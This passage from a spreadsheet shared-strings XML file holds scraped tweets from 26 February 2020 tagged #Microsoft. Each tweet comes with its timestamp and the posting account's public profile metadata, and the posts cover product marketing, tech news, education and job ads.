  <si>
    <t>'#AmericanHorrorStory': 
#Macaulay Culkin Joins 
#SarahPaulson, #Evan Peters in #Season10 https://t.co/mOMxDnWHCb 
#bigdata 
#usa 
#uk 
#canada #australia #Linux 
#oracle #Microsoft #apple
#fashion #healthcare 
#google #youtube 
#Twitter #socialmedia 
#socialmediamarketing #uk</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</si>
  <si>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927211,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</si>
  <si>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16:22:34 +0000 2020</t>
  </si>
  <si>
    <t>With no extended support for SQL Server 2008 and 2008 R2, it's time to modernize. Contact Bross Group to start your transformation journey with #SQLServer 2017, #Windows Server 2016 and #Microsoft #Azure. https://t.co/kBXbl3pDkP</t>
  </si>
  <si>
    <t>Wed Feb 26 16:22:28 +0000 2020</t>
  </si>
  <si>
    <t>From mobility apps to #Office365 productivity tools to collaboration apps to #PowerBI analytics, #Microsoft #Teams delivers everything you need to keep schedules and projects all in one place. https://t.co/p3iQMFj8KL</t>
  </si>
  <si>
    <t>Wed Feb 26 16:22:19 +0000 2020</t>
  </si>
  <si>
    <t>Break down data silos with drag and drop data exploration and interactive reporting with #Microsoft #PowerBI and #Azure. Never miss a post from VerisVisalign. Subscribe now! https://t.co/2kuKup9TAU</t>
  </si>
  <si>
    <t>Wed Feb 26 16:21:53 +0000 2020</t>
  </si>
  <si>
    <t>Building A GIANT ALIEN ROBOT | Subnautica Below Zero - Part 16 #snes #retrogaming #k #microsoft https://t.co/dLYbv3NXJa</t>
  </si>
  <si>
    <t>Wed Feb 26 16:20:52 +0000 2020</t>
  </si>
  <si>
    <t>#Cisco, #Google, #Microsoft Lead Chorus of New #Security Initiatives https://t.co/6ZGcy8uDmD</t>
  </si>
  <si>
    <t>{'id': 30371501, 'id_str': '30371501', 'name': 'VirtualizationReview', 'screen_name': 'VirtReview', 'location': 'Online and in Print', 'description': 'Official Twitter account for Virtualization Review magazine. News, analysis, trends, reviews &amp; best practices on all aspects of IT virtualization.', 'url': 'http://t.co/U6IwIDmSIy', 'entities': {'url': {'urls': [{'url': 'http://t.co/U6IwIDmSIy', 'expanded_url': 'http://virtualizationreview.com', 'display_url': 'virtualizationreview.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3742, 'friends_count': 3759, 'listed_count': 218, 'created_at': 'Sat Apr 11 02:09:18 +0000 2009', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4671,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'http://pbs.twimg.com/profile_images/1925578899/Twitter_logo_virtualization_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1925578899/Twitter_logo_virtualization_normal.jpg', 'profile_link_color': '0066CC', 'profile_sidebar_border_color': '186F91', 'profile_sidebar_fill_color': 'EEEEEE', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 16:19:52 +0000 2020</t>
  </si>
  <si>
    <t>Okay, now this is a thing. Microsoft Advanced Threat Protection in Linux. Wondering what crap I will detect on my system... #mdatp #microsoft #security #RSA2020 
https://t.co/pBiIMxLLpz</t>
  </si>
  <si>
    <t>{'id': 38291720, 'id_str': '38291720', 'name': 'Benn0rs', 'screen_name': 'Benn0rs', 'location': 'Dortmund', 'description': 'private bio(opensource(), gaming(), cybersec(),  Microsoft());\n\n opinions are my own.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 43, 'friends_count': 803, 'listed_count': 0, 'created_at': 'Wed May 06 22:18:17 +0000 2009', 'favourites_count': 520, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 190,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'http://pbs.twimg.com/profile_images/1211979426625445888/5zMltqWt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1211979426625445888/5zMltqWt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/38291720/1516457569',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</si>
  <si>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16:17:20 +0000 2020</t>
  </si>
  <si>
    <t>Cost savings and business benefits of deploying Outlook mobile in the enterprise https://t.co/s8A7VxazTk #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 16:15:42 +0000 2020</t>
  </si>
  <si>
    <t>Another @wakelet collection!  This one is my articles about @msonenote 
https://t.co/EPKsaMRlwU
#MIEExpert 
#OneNote 
#Microsoft 
#MicrosoftEDU 
#UDL
#accessibility
#ImmersiveReader</t>
  </si>
  <si>
    <t>Wed Feb 26 16:14:47 +0000 2020</t>
  </si>
  <si>
    <t>How to Balance Security with Digital Transformation Read https://t.co/nHNlsSdbFq
#ilinksystems #ilinkdifference #digitaltransformation #cto #digitaltechnology #technology #digital #business #businesstransformation #microsoft #businesschange #change #informationtechnology</t>
  </si>
  <si>
    <t>Wed Feb 26 16:12:47 +0000 2020</t>
  </si>
  <si>
    <t>7 integrations that maximize impact of adopting a #Microsoft or #Cisco #UComm solution: https://t.co/Ad8SWd9LHf https://t.co/Uqw532mdJZ</t>
  </si>
  <si>
    <t>{'id': 54646443, 'id_str': '54646443', 'name': 'CallTower Inc', 'screen_name': 'calltower', 'location': 'South Jordan, UT', 'description': 'CallTower exists to enable people to easily connect - delivering, integrating and supporting global #UCaaS industry leaders #cisco #microsoft', 'url': 'http://t.co/GP8Z9JonfI', 'entities': {'url': {'urls': [{'url': 'http://t.co/GP8Z9JonfI', 'expanded_url': 'http://www.calltower.com', 'display_url': 'calltower.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 10197, 'friends_count': 8496, 'listed_count': 249, 'created_at': 'Tue Jul 07 19:18:32 +0000 2009', 'favourites_count': 1953, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8578, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '555657', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1088849669554229248/hDqb4Zca_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1088849669554229248/hDqb4Zca_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/54646443/1550764048', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DDEEF6', 'profile_text_color': '0084B4', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Check out our latest blog post, "Blueprinting the Analytics Cloud-
The journey to a data driven business." We discuss the value in Azure Blueprints, and how it can positively impact your business. #spyglassmtg #microsoft #azureblueprints  https://t.co/8sFCEQCB52 https://t.co/DG0W0qAIFq</t>
  </si>
  <si>
    <t>Wed Feb 26 16:12:42 +0000 2020</t>
  </si>
  <si>
    <t>With uncertain economic conditions, more competition than ever, and a greater focus on service, theres a reason #Microsoft is investing heavily  and succeeding in  Industrial IoT. Learn more: https://t.co/0fOpd0HIcw 
#iot #iiot #manufacturing #microsoftpartner #azure https://t.co/3ZPtxbrdkY</t>
  </si>
  <si>
    <t>Wed Feb 26 16:12:32 +0000 2020</t>
  </si>
  <si>
    <t>Awesome!! A web-based #Microsoft #Paint developed in #Javascript !! Check it out at https://t.co/skuvtZEgcP https://t.co/8esfXyUHiP</t>
  </si>
  <si>
    <t>{'id': 151736750, 'id_str': '151736750', 'name': 'Sivaraj Ambat', 'screen_name': 'sivarajTweets', 'location': 'India', 'description': 'â¤  #AppDev #WebDev #FrontEnd #Cloud #AI #ML #DataScience #Blockchain #RPA #Chatbot #Design #UI #UX #Security #AR #EdTech #Innovations  | Tweets are personal |', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 480, 'friends_count': 1011, 'listed_count': 166, 'created_at': 'Fri Jun 04 03:40:42 +0000 2010', 'favourites_count': 4044, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3377, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '090A0A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1024009273335013376/myPwa1HC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1024009273335013376/myPwa1HC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/151736750/1532979041', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E6F6F9', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 16:12:03 +0000 2020</t>
  </si>
  <si>
    <t>Subscribe to discover how #Dynamics365 and other #Microsoft solutions can help you elevate and transform engagements with both existing and prospective customers. https://t.co/ypuypb8ujV</t>
  </si>
  <si>
    <t>Wed Feb 26 16:11:53 +0000 2020</t>
  </si>
  <si>
    <t>Airport security officer-turned-developer helps Heathrow book a faster journey to #DigitalTransformation with #Microsoft #PowerPlatform. Watch the video. https://t.co/THtjMkPj4M</t>
  </si>
  <si>
    <t>Wed Feb 26 16:11:48 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #ERP #microsoft     Did you know modernizing your ERP solutions can decrease operating costs by 20-30%. What are you doing to? #innovation #solutions https://t.co/h2dqrlqNmS</t>
  </si>
  <si>
    <t>Wed Feb 26 16:11:40 +0000 2020</t>
  </si>
  <si>
    <t>Today, well take a look at the new Microsoft Office 365 app and tell you how you can download it on your device: https://t.co/WV8B2hzoCj
#microsoft #office #office365 #software #technology #productivity #collaboration</t>
  </si>
  <si>
    <t>Wed Feb 26 16:11:20 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Pending $link anouncements 
crypto: $xtz &amp;amp; $eth 
non crypto: #Microsoft &amp;amp; #Swift
#chainlink: MIXICLES + Staking
Imagine when all these are announced? </t>
  </si>
  <si>
    <t>{'id': 1184819943482822656, 'id_str': '1184819943482822656', 'name': 'ChainLinkJunkie', 'screen_name': 'Chainlinkjunkie', 'location': 'gfy', 'description': 'Superhero all seeing wise Frog. Here to save plebs from getting REKT. Junkie addicted to #ChainLink and wew cant stop giving $link price action play by play..ðŸ”¥', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2566, 'friends_count': 184, 'listed_count': 13, 'created_at': 'Thu Oct 17 13:14:25 +0000 2019', 'favourites_count': 5216, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4277, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1231996853333512193/ZHrdW-24_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231996853333512193/ZHrdW-24_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1184819943482822656/1582138822',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</si>
  <si>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16:11:00 +0000 2020</t>
  </si>
  <si>
    <t>Confused on how to buy Business Central?
https://t.co/PjxE6erIBj
#Microsoft #Microsoftdynamics #Dynamics365 #businesscentral #businesscentralhelp https://t.co/TDz9wpZ8bg</t>
  </si>
  <si>
    <t>Wed Feb 26 16:10:16 +0000 2020</t>
  </si>
  <si>
    <t>Are you a #Microsoft Dynamics GP user? Is it time for you to make a choice? Learn about a cloud alternative here from @Acumatica! https://t.co/5Mo781ykMM</t>
  </si>
  <si>
    <t>{'id': 70420298, 'id_str': '70420298', 'name': 'Donas Group', 'screen_name': 'donasgroup', 'location': 'Arlington Heights, IL', 'description': '', 'url': 'http://t.co/GSVsJpeK6E', 'entities': {'url': {'urls': [{'url': 'http://t.co/GSVsJpeK6E', 'expanded_url': 'http://www.donas.com', 'display_url': 'donas.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 52, 'friends_count': 53, 'listed_count': 2, 'created_at': 'Mon Aug 31 15:33:55 +0000 2009', 'favourites_count': 85, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 430,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'http://pbs.twimg.com/profile_images/1093620044716601344/h1K0-TJW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1093620044716601344/h1K0-TJW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/70420298/1549573102',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</si>
  <si>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Feb 26 16:09:59 +0000 2020</t>
  </si>
  <si>
    <t>In his latest post, #Microsoft #Architect, Mark Arnold gives us An #Office #365 fable. One of a company spin-off and a mission: Get these 100 users off our Office 365, but they  need access to all those terabytes of project files and design drawings."  https://t.co/EuMyi2UHgi</t>
  </si>
  <si>
    <t>Wed Feb 26 16:09:46 +0000 2020</t>
  </si>
  <si>
    <t>What happens if the people running the #AWS servers, #Google, #Microsoft and the financial systems come down with the #Corona virus?</t>
  </si>
  <si>
    <t>{'id': 2946628392, 'id_str': '2946628392', 'name': 'Robert M. Furst', 'screen_name': 'robert_furst', 'location': 'Boca Raton, FL', 'description': 'Qualified Workplace Violence &amp; Threat Specialist (Q|WVTS), Risk Management, Project Management, SEO, Graphic Artist, Programmer', 'url': 'https://t.co/yQ9XoaZw6I', 'entities': {'url': {'urls': [{'url': 'https://t.co/yQ9XoaZw6I', 'expanded_url': 'https://www.robertfurst.com/', 'display_url': 'robertfurst.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 75, 'friends_count': 91, 'listed_count': 10, 'created_at': 'Sun Dec 28 17:29:13 +0000 2014', 'favourites_count': 214, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/862109476681388032/zLcecDcF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/862109476681388032/zLcecDcF_normal.jpg',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</si>
  <si>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16:09:28 +0000 2020</t>
  </si>
  <si>
    <t>We've got your back! Get help putting #technology in your school through #Microsoft's online tools. Select, deploy, and learn-it's easy as 1-2-3!     #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/cnZiIrfV5f</t>
  </si>
  <si>
    <t>Wed Feb 26 16:09:19 +0000 2020</t>
  </si>
  <si>
    <t>We've got your back! Get help putting #technology in your school through #Microsoft's online tools. Select, deploy, and learn-it's easy as 1-2-3!     #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/6SikFPd96Q</t>
  </si>
  <si>
    <t>Wed Feb 26 16:08:23 +0000 2020</t>
  </si>
  <si>
    <t>Education technology from #Microsoft is changing the way students learn, communicate, and collaborate. Check out how one school district is leveraging #MicrosoftEducation technology to empower their students and teachers to succeed. https://t.co/Abw3Vfil7y</t>
  </si>
  <si>
    <t>{'id': 2271838838, 'id_str': '2271838838', 'name': 'TrimaxSecure', 'screen_name': 'trimaxsecure', 'location': '', 'description': '', 'url': 'http://t.co/BPnTGEInt9', 'entities': {'url': {'urls': [{'url': 'http://t.co/BPnTGEInt9', 'expanded_url': 'http://www.trimaxsecure.com', 'display_url': 'trimaxsecure.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 47, 'friends_count': 152, 'listed_count': 2, 'created_at': 'Wed Jan 01 16:35:30 +0000 2014', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 301,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'http://pbs.twimg.com/profile_images/928125298004111360/aLVTRmaP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/928125298004111360/aLVTRmaP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2271838838/1510699900',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</si>
  <si>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16:07:53 +0000 2020</t>
  </si>
  <si>
    <t>The #U.#S. #District #Court in Seattle convicted a former #Microsoft #employee of 18 federal felonies. #Ultimately stealing over $10 #million in less than two years,
https://t.co/tK1i0dTlc5
#Rakamoto #Wednesdaythoughts #Blockchain #Crypto #Bitcoin #Digital #Money #Coins #Dollar</t>
  </si>
  <si>
    <t>Wed Feb 26 16:07:33 +0000 2020</t>
  </si>
  <si>
    <t>Walking down the Memory Lane!
Meet @satyanadella CEO #Microsoft This is what he had to say....
@cbseindia29 @maltiduggal @nevineasfour @charuchhabra2 @MeenakshiUberoi @ashokkp @tkaur2210 @Rashmi128o @meenaks09023755 @shardapullabha2 @banaqvi @meenakshi2018 https://t.co/d1n7n5OfYP</t>
  </si>
  <si>
    <t>{'id': 1346712037, 'id_str': '1346712037', 'name': 'ParamjeetKaurDhillon', 'screen_name': 'pkdhillon08', 'location': 'India', 'description': 'Head Teacher, Kamla Nehru Public School Phagwara India MIEExpert,MIE Fellow, British Council School Ambassador, Validated BC trainer for Core Skills.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2550, 'friends_count': 1139, 'listed_count': 39, 'created_at': 'Fri Apr 12 12:18:18 +0000 2013', 'favourites_count': 21377, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11740,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'http://pbs.twimg.com/profile_images/1210772677796884482/TXNjD0RI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210772677796884482/TXNjD0RI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1346712037/1545667567',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</si>
  <si>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This #Microsoft job might be a great fit for you. Click the link in our bio to see it and more. Sr. Net Developer at Robert Half Technology #DesMoines, IA</t>
  </si>
  <si>
    <t>{'id': 113370459, 'id_str': '113370459', 'name': 'TMJ-IAD IT Jobs', 'screen_name': 'tmj_IAD_it', 'location': 'Des Moines, IA', 'description': 'Follow this account for geo-targeted Software Dev. - General/IT job tweets in Des Moines, IA. Need help? Tweet us at @CareerArc!', 'url': 'https://t.co/7qZhN8zbhr', 'entities': {'url': {'urls': [{'url': 'https://t.co/7qZhN8zbhr', 'expanded_url': 'http://bit.ly/2Kf8sH0', 'display_url': 'bit.ly/2Kf8sH0', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 337, 'friends_count': 251, 'listed_count': 138, 'created_at': 'Thu Feb 11 14:58:57 +0000 2010', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 716, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '253956', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/671566046818492416/yYu7UjRU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/671566046818492416/yYu7UjRU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/113370459/1448948799', 'profile_link_color': '4A913C', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '407DB0', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 16:06:59 +0000 2020</t>
  </si>
  <si>
    <t>Ss used Microsoft Forms to create and share their survey ?s with their peers. Then Ss plot their survey data on a line plot. Last, Ss create questions based off the fractions on their line plot. #math #microsoft #performancebasedassessment @TrittSTEAM @karencarstens @STEMcobb https://t.co/jy1heaDwO8</t>
  </si>
  <si>
    <t>{'id': 3388296039, 'id_str': '3388296039', 'name': 'Tara Rich', 'screen_name': 'taramrich', 'location': '', 'description': '4th Grade Teacher @ Tritt Elementary. Fan of all things kindness, math, and outdoors.', 'url': 'https://t.co/52OoQwsmpN', 'entities': {'url': {'urls': [{'url': 'https://t.co/52OoQwsmpN', 'expanded_url': 'http://richtara.edublogs.org', 'display_url': 'richtara.edublogs.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 74, 'friends_count': 87, 'listed_count': 1, 'created_at': 'Thu Jul 23 01:19:21 +0000 2015', 'favourites_count': 231, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 124,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'http://pbs.twimg.com/profile_images/1170538260596236290/e55P7t4O_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1170538260596236290/e55P7t4O_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3388296039/1564092399',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</si>
  <si>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16:05:18 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 Always On #VPN clients prompted for authentication when accessing internal resources. #Microsoft #Windows10 #Win10 #mobility #aovpn https://t.co/t2xrANsemj</t>
  </si>
  <si>
    <t>Wed Feb 26 16:05:12 +0000 2020</t>
  </si>
  <si>
    <t>Get help putting the right technology in your school. Learn how #Microsoft devices enable better learning outcomes.    #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/qRhcUVMhCB</t>
  </si>
  <si>
    <t>{'id': 721072805618520064, 'id_str': '721072805618520064', 'name': 'Erich A Dejesus', 'screen_name': 'erich_dejesus', 'location': 'Atlanta, GA', 'description': 'Chief Architect Power Platform @aptude. working in #PowerPlatforms, #Azure &amp; #SSAS . Also Group Leader @pbiusergroup. Interested on #MachineLearning and #AI', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 213, 'friends_count': 208, 'listed_count': 20, 'created_at': 'Fri Apr 15 20:28:48 +0000 2016', 'favourites_count': 1816, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1899,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'http://pbs.twimg.com/profile_images/1194826638418157568/UYSjD5tx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1194826638418157568/UYSjD5tx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/721072805618520064/1491326714',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</si>
  <si>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16:02:37 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft now makes you disconnect the computer from the Internet to create a local #Windows 10 account during setup.
https://t.co/KrIDwlwAIY</t>
  </si>
  <si>
    <t>{'id': 20231269, 'id_str': '20231269', 'name': 'Envescent Cloud and Cybersecurity', 'screen_name': 'envescent', 'location': 'Washington, DC', 'description': 'Providing automation, cloud, compliance, consulting, cybersecurity, vulnerability management and training solutions.\n\nLocally owned and operated since 1999.', 'url': 'https://t.co/RLNonPd3JW', 'entities': {'url': {'urls': [{'url': 'https://t.co/RLNonPd3JW', 'expanded_url': 'https://envescent.com', 'display_url': 'envescent.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2291, 'friends_count': 1554, 'listed_count': 337, 'created_at': 'Fri Feb 06 11:44:08 +0000 2009', 'favourites_count': 9528, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11481, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '6F7F93', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/843874445752197122/ntJdH_s8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/843874445752197122/ntJdH_s8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20231269/1549374285', 'profile_link_color': '586B84', 'profile_sidebar_border_color': '525252', 'profile_sidebar_fill_color': 'D9E0EB', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 16:02:26 +0000 2020</t>
  </si>
  <si>
    <t>Don't be fooled. #Cloud and on-premise ERP solutions might look identical, yet there are often costs below the surface. This free TCO Iceberg Infographic explains: https://t.co/FlQAbS0e1r
#Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/wZvSYej1v1</t>
  </si>
  <si>
    <t>Wed Feb 26 16:01:55 +0000 2020</t>
  </si>
  <si>
    <t>Processing large volumes of data can require significant resources with needs that fluctuate over time with different business seasons.
Let us help find a solution for you!
https://t.co/ldGODwtSKA
#microsoft #alliance #cloudanalytics #datadriven https://t.co/vlMBHxGoYv</t>
  </si>
  <si>
    <t>{'id': 986933425, 'id_str': '986933425', 'name': 'Definitive Logic', 'screen_name': 'DefinitiveLogic', 'location': 'Arlington, VA', 'description': 'Definitive Logic is a new breed of modern consulting firms that embed our smartest and most strategic people at the implementation level. Weâ€™re the preferred te', 'url': 'https://t.co/nIhm3SsWbb', 'entities': {'url': {'urls': [{'url': 'https://t.co/nIhm3SsWbb', 'expanded_url': 'http://www.definitivelogic.com', 'display_url': 'definitivelogic.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 380, 'friends_count': 1026, 'listed_count': 21, 'created_at': 'Mon Dec 03 16:10:55 +0000 2012', 'favourites_count': 50, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1526, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '787E8C', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1203029269489897472/YLXDnv2U_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1203029269489897472/YLXDnv2U_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/986933425/1575659504',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</si>
  <si>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16:01:12 +0000 2020</t>
  </si>
  <si>
    <t>Outlook Favourites: Add folders to your Favorites in Outlook so they are quick to get to by right-clicking them and choose Add to Favorites. #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 16:00:48 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft's New Xbox One Dashboard Available with Updated Home Screen
#Microsoft #XboxOne #XboxOneDashboard https://t.co/Z81iay52Q9 https://t.co/rpcGVvdoAV</t>
  </si>
  <si>
    <t>Wed Feb 26 16:00:18 +0000 2020</t>
  </si>
  <si>
    <t>Zindi is excited to announce @Microsoft as a sponsor for UmojaHack Africa! @Microsoft strives to empower people &amp;amp; organizations to achieve more. @Microsoft will also be assisting with Azure training and credits for universities. 
#UmojaHackAfrica #ZindiHack #Microsoft #data https://t.co/c1IlPwm7xu</t>
  </si>
  <si>
    <t>{'id': 994494661346627585, 'id_str': '994494661346627585', 'name': 'Zindi', 'screen_name': 'ZindiAfrica', 'location': '', 'description': 'Solving Africaâ€™s toughest challenges through our competition platform using #datascience #machinelearning #AI #zindichallenge #womenintech #zindi', 'url': 'https://t.co/QvPpmxI8AX', 'entities': {'url': {'urls': [{'url': 'https://t.co/QvPpmxI8AX', 'expanded_url': 'http://www.zindi.africa', 'display_url': 'zindi.africa', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4215, 'friends_count': 2322, 'listed_count': 29, 'created_at': 'Thu May 10 08:29:38 +0000 2018', 'favourites_count': 1413, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1797,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'http://pbs.twimg.com/profile_images/1026842061587271680/NHtP1F7r_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1026842061587271680/NHtP1F7r_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/994494661346627585/1533653179',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</si>
  <si>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16:00:06 +0000 2020</t>
  </si>
  <si>
    <t>Learn the core concepts of #BI and #analytics, the business motivations behind them, and the building block technologies to implement them. Download the e-book. #Microsoft #Data #CXO #CIO https://t.co/UQwuSB8PAl #MSFTAdvocate</t>
  </si>
  <si>
    <t>{'id': 25617841, 'id_str': '25617841', 'name': 'Stephen Legler ðŸ™ðŸ‡ºðŸ‡¸', 'screen_name': 'smlegler', 'location': '', 'description': "Posts are mine. I'm a Compassionate Conservative. Work for #Microsoft as an Azure Business Specialist for Data &amp; AI. BIO in website link.", 'url': 'https://t.co/Al024fEN2A', 'entities': {'url': {'urls': [{'url': 'https://t.co/Al024fEN2A', 'expanded_url': 'https://www.linkedin.com/pulse/getting-know-stephen-legler-stephen-legler', 'display_url': 'linkedin.com/pulse/getting-â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 278, 'friends_count': 961, 'listed_count': 50, 'created_at': 'Sat Mar 21 01:41:25 +0000 2009', 'favourites_count': 5506, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5580,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'http://pbs.twimg.com/profile_images/658707519150424066/mebYb_ci_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/658707519150424066/mebYb_ci_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/25617841/1468892913', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 